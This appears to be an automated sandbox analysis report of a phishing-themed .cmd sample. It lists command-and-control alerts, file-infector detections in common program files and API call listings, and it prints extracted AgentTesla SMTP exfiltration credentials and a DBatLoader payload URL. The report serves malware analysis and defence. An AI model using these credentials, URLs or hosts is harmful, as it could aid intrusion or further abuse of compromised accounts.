                    2024-11-18T09:58:59.043100+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.7 | 50124 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-11-18T09:56:57.035382+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49914 | 54.244.188.177 | 80 | TCP
                    2024-11-18T09:57:58.560314+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50028 | 82.112.184.197 | 80 | TCP
                    2024-11-18T09:59:02.553719+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50132 | 72.52.178.23 | 80 | TCP
                    2024-11-18T10:00:03.724220+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 60112 | 172.234.222.143 | 80 | TCP

                    AV Detection

                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
                    Source: alpha.exe.4508.13.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
                    Source: Juqmtmya.PIF.27.dr, Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
                    Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, ReversingLabs: Detection: 13%
                    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Joe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Joe Sandbox ML: detected
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139F944 CryptDecodeObject,GetLastError,#357,9_2_00007FF7F139F944
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB950 I_CryptGetLruEntryData,#357,9_2_00007FF7F13CB950
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,9_2_00007FF7F141BA14
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,9_2_00007FF7F136F9B8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,9_2_00007FF7F13CB9CC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1393C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F1393C60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,9_2_00007FF7F13D1C84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,9_2_00007FF7F137FC20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F139FC34
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445C54 CryptDecodeObjectEx,CryptDecodeObjectEx,9_2_00007FF7F1445C54
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1381C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,9_2_00007FF7F1381C50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,9_2_00007FF7F13D5CE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,9_2_00007FF7F1417B60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445B90 CryptDecodeObjectEx,memmove,9_2_00007FF7F1445B90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,9_2_00007FF7F140FB94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,9_2_00007FF7F136BB80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,9_2_00007FF7F141BB50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13ABB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13ABB38
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,9_2_00007FF7F13EFB50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1415B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,9_2_00007FF7F1415B44
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E3BEB
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1345BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF7F1345BA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF7F13EBBC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1369BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,9_2_00007FF7F1369BC8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,9_2_00007FF7F140DE70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13D1E2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,9_2_00007FF7F1445E3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,9_2_00007FF7F1417EE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,9_2_00007FF7F13D5F04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1397F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,9_2_00007FF7F1397F14
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,9_2_00007FF7F139DEA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,9_2_00007FF7F13CDEB0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,9_2_00007FF7F13C3D60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445D74 CryptDecodeObjectEx,strcmp,strcmp,9_2_00007FF7F1445D74
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13A1D70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1399D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1399D6C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139DD80 CertFindExtension,CryptDecodeObject,9_2_00007FF7F139DD80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,9_2_00007FF7F13F5D80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140FD2C CryptDecryptMessage,GetLastError,#357,9_2_00007FF7F140FD2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,9_2_00007FF7F13FDD1C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,9_2_00007FF7F141BD3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,9_2_00007FF7F1417D3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1351DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,9_2_00007FF7F1351DE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,9_2_00007FF7F1375DF7
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF7F1375DA1
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,9_2_00007FF7F13B4070
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,9_2_00007FF7F140E044
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13760DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF7F13760DA
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,9_2_00007FF7F137FF64
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF7F13E9F90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445F20 CryptDecodeObjectEx,9_2_00007FF7F1445F20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,9_2_00007FF7F13B5F54
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1445FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,9_2_00007FF7F1445FF0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF7F1375FE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF7F13E5FA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F140E274
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13B6280
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1402278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,9_2_00007FF7F1402278
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,9_2_00007FF7F144A2E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1380300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,9_2_00007FF7F1380300
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,9_2_00007FF7F1418298
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF7F13A417C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF7F13C6194
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144613C CryptDecodeObjectEx,9_2_00007FF7F144613C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,9_2_00007FF7F13CA1E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF7F13DE1F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1446214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,9_2_00007FF7F1446214
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,9_2_00007FF7F141A1F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13821A4 #360,#359,#357,#357,BCryptFreeBuffer,9_2_00007FF7F13821A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14061AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,9_2_00007FF7F14061AC
